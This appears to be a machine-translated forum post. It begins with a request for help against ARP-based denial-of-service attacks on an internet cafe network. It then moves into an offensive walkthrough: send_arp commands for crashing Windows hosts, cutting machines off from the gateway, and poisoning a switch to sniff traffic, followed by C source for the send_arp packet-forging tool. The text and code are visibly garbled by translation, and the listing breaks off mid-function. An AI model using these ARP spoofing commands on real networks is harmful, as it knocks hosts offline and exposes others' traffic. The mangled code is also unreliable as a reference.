Defend against LAN attacks ZT!

A friend of mine suffered a strange attack recently in the Internet cafe, where there were 60 machines and six other Internet cafes in one CIDR block. The IP address ranges from 192.168.0.1 ~ 192.168.0.255: Shared CS servers and WEB and streaming media servers. One CS server and Streaming Media Server are in another Internet cafe.
During the last night and noon, when the internet cafe was full, someone attacked the IP segment of the Internet cafe. A large-area IP address conflict occurs, causing the server to temporarily stop responding to the network, and the CS server and streaming media server in the network immediately stop responding. Generally, it lasts for more than half an hour, and the IP conflict rate is about 10 seconds. This is the case for several days in a row, causing great losses to him.

My friend turned to me for help, so I first tried to prove that the deliberate IP address modification method could not cause the server to lose response, so I installed some monitoring software on two machines in his Internet cafe, trying to capture the attack packets of the other party, and then obtaining the MAC address of the other party to find the attack source. Because the main manifestation is IP conflict, I used commview3 to capture all ARP packets. As a result, when the other party attacked at night, I found a large number of regular ARP broadcast packets, the packages are obviously generated by some software. The MAC address is randomly forged, and the IP address is the Series IP address of his internet cafe. This package is different from the general boot package, which is a pass-thourgh package, after the machine receives the message, the 98 system immediately loses the network response. The 2 K system also loses the response after waiting for a long Time or restarting. The system can be recovered only after confirmation, but all connected users are Out of Time.

Because the MAC address in the package is forged, I cannot find the source, so I went to the Internet to find some information to prove that this is an ARP Denial-of-Service attack, but I did not find any effective preventive measures, microsoft has no corresponding patches. The only way is to use hardware to store the ARP list unless you use a vroarp to block ARP in the network, but the vroarp is not a device that can be undertaken by a small Internet cafe. Of course, if you divide the network segments, you can also use the gateway to separate them from everyone, because ARP is only transmitted in one network segment, but so that others cannot share their servers, in addition, attackers can go to their Internet cafes to continue damages.

I tried a variety of firewall software and proved that I could not stop such attack packets. No firewall product can shield illegal ARP packets. The use of Skynet 2.5 and Kingsoft network does not block the attack even with the option of disconnecting the network.

I later found a file called "..." on the Internet. (To prevent someone with ulterior motives from doing bad things, I skipped the name of the software, and it was also my note) The software can achieve this effect, this proves that such attack software exists on the Internet. You can search and download it from google.

The only way I can tell him now is to unplug the network cable when an attack occurs. You guys, there is no cheap and convenient way to solve this problem. My friends are in a hurry, in this way, his internet cafe will not be able to continue.

Please help !! Thanks :)

Analysis:
There are already a lot of information about ARP on the Internet, so I don't need to talk about it all.
In the words of a certain expert, "We can do a lot of things, the only thing
It limits our creativity and imagination ".

The same is true for ARP.

The machines discussed below are:
An attacker: 10.5.4.178
Hardware address: 52: 54: 4C: 98: EE: 2F
My machine: 10.5.3.69
Hardware address: 52: 54: 4C: 98: ED: C5
Gateway: 10.5.0.3
Hardware address: 00: 90: 26: 3D: 0C: F3
Host On the other port of a vswitch: 10.5.3.3
Hardware address: 52: 54: 4C: 98: ED: F7

I. Use ARP to break WINDOWS Screen Saver
Principle: IP conflict is higher than Screen Saver. When there is a conflict
Jump out of screensaver.
Key: the number of ARP packets is appropriate.
[Root @ sztcww tools] #./send_arp 10.5.4.178 00: 90: 26: 3D: 0C: F3
10.5.4.178 52: 54: 4C: 98: EE: 2F 40

Ii. IP conflict and crash caused by ARP
Principle: WINDOWS 9X and NT4 cannot handle IP conflicts, resulting in a crash.
Note: For WINDOWS 2 K, LINUX is equivalent to flooding, which is only equivalent to FLOODING.
Most of them are effective. For LINUX, the system is obviously slowed down.
[Root @ sztcww tools] #./send_arp 10.5.4.178 00: 90: 26: 3D: 0C: F3
10.5.4.178 52: 54: 4C: 98: EE: 2F 999999999

3. If ARP is used to spoof the Gateway, a machine on the LAN may fail to exit the gateway.
Principle: Use the ARP response packet to refresh the corresponding host to make it unavailable.
[Root @ sztcww tools] #./send_arp 10

. 5.4.178 52: 54: 4C: 98: EE: 22
10.5.4.178 00: 90: 26: 3D: 0C: F3 1
Note: If the preceding command is used only for a few seconds
The cache will be correctly refreshed by the attacked host, so as long...

4. Use ARP to spoof the switch and listen to the sub-host at the other end of the switch.
Modify send_arp.c to construct the following data packets.
Ethhdr
Srchw: 52: 54: 4C: 98: ED: F7 ---> dsthw: FF proto: 806 H
Arphdr
Hwtype: 1 protol: 800 H hw_size: 6 pro_size: 4 op: 1
S_ha: 52: 54: 4C: 98: ED: F7 s_ip: 10.5.3.3
D_ha: 00: 00: 00: 00: 00: 00 d_ip: 10.5.3.3
Then sniffer.
Principle:
A vswitch has the MAC address memory function. It maintains a MAC address and Its slogan table.
So you can start with ARP spoofing and then listen.
However, it must be pointed out that after spoofing, the same MAC address will have two port numbers.
"This is actually a matter of competition," yuange said ."
It seems that ARP will affect the entire network in the future, but I am not sure
Since it is a competition, listening can only listen on a part of the same HUB.
It may affect the listener because some data is lost.

Of course, there are other applications that require the cooperation of other technologies.
The following is the source program of send_arp.c.

/*
This program sends out one ARP packet with source/target IP
And Ethernet hardware addresses suuplied by the user. It
Compiles and works on Linux and will probably work on any
Unix that has SOCK_PACKET. volobuev@t1.chem.umn.edu
*/
# Include <netdb. h>
# Include <sys/socket. h>
# Include <sys/types. h>
# Include <stdio. h>
# Include <errno. h>
# Include <sys/ioctl. h>
# Include <net/if. h>
# Include <signal. h>
# Include <netinet/ip. h>
# Include <netinet/in. h>
# Include <string. h>
# Include <arpa/inet. h>
# Include <netinet/ip_icmp.h>
# Include <linux/if_ether.h>
# Define ETH_HW_ADDR_LEN 6
# Define IP_ADDR_LEN 4
# Define ARP_FRAME_TYPE 0x0806
# Define ETHER_HW_TYPE 1
# Define IP_PROTO_TYPE 0x0800
# Define OP_ARP_REQUEST 2
# Define OP_ARP_QUEST 1
# Define DEFAULT_DEVICE "eth0"
Char usage [] = {"send_arp: sends out custom ARP packet. yuri volobuev
Usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number "};
Struct arp_packet
{
U_char targ_hw_addr [ETH_HW_ADDR_LEN];
U_char src_hw_addr [ETH_HW_ADDR_LEN];
U_short frame_type;
U_short hw_type;
U_short prot_ty

Pe;
U_char hw_addr_size;
U_char prot_addr_size;
U_short op;
U_char sndr_hw_addr [ETH_HW_ADDR_LEN];
U_char sndr_ip_addr [IP_ADDR_LEN];
U_char rcpt_hw_addr [ETH_HW_ADDR_LEN];
U_char rcpt_ip_addr [IP_ADDR_LEN];
U_char padding [18];
};
Void die (char *);
Void get_ip_addr (struct in_addr * char *);
Void get_hw_addr (char *);
Int main (int argc char * argv [])
{
Struct in_addr src_in_addr targ_in_addr;
Struct arp_packet pkt;
Struct sockaddr sa;
Int sock;
Int jnumber;
If (argc! = 6)
Die (usage );
Sock = socket (AF_INET SOCK_PACKET htons (ETH_P_RARP ));
If (sock <0)
{
Perror ("socket ");
Exit (1 );
}
Number = atoi (argv [5]);
Pkt. frame_type = htons (ARP_FRAME_TYPE );
Pkt. hw_type = htons (ETHER_HW_TYPE );
Pkt. prot_type = htons (IP_PROTO_TYPE );
Pkt. hw_addr_size = ETH_HW_ADDR_LEN;
Pkt. prot_addr_size = IP_ADDR_LEN;
Pkt. op = htons (OP_ARP_QUEST );
Get_hw_addr(pkt.tar g_hw_addr argv [4]);
Get_hw_addr (pkt. rcpt_hw_addr argv [4]);
Get_hw_addr (pkt. src_hw_addr argv [2]);
Get_hw_addr (pkt. sndr_hw_addr argv [2]);
Get_ip_addr (& src_in_addr argv [1]
Get_ip_addr (& targ_in_addr argv [3]
Memcpy (pkt. sndr_ip_addr & src_in_addr IP_ADDR_LEN );
Memcpy (pkt. rcpt_ip_addr & targ_in_addr IP_ADDR_LEN );
Bzero (pkt. padding18 );
Strcpy (sa. sa_dataDEFAULT_DEVICE );
For (j = 0; j <number; j ++)
{
If (sendto (sock & pktsizeof (pkt) 0 & sasizeof (sa) <0)
{
Perror ("sendto ");
Exit (1 );
}
}
Exit (0 );
}
Void die (char * str)
{
Fprintf (stderr "% s" str );
Exit (1 );
}
Void get_ip_addr (struct in_addr * in_addr char * str)
{
Struct hostent * hostp;
In_addr-> s_addr = inet_addr (str );
If (in_addr-> s_addr =-1)
{
If (hostp = gethostbyname (str )))
Bcopy (hostp-> h_addr in_addr hostp-> h_length );
Else {
Fprintf (stderr "send_arp: unknown host % s" str );
Exit (1)

;
}
}
}
Void get_hw_addr (char * buf char * str)
{
Int I;
Char c val;
For (I = 0; I <ETH_HW_ADDR_LEN; I ++)
{
If (! (C = tolower (* str ++ )))
Die ("Invalid hardware address ");
If (isdigit©)
Val = c-0;
Else if (c> = a & c <= f)
Val = c-a + 10;
Else
Die ("Invalid hardware address ");
* Buf = val <4;
If (! (C = tolower (* str ++ )))
Die ("Invalid hardware addres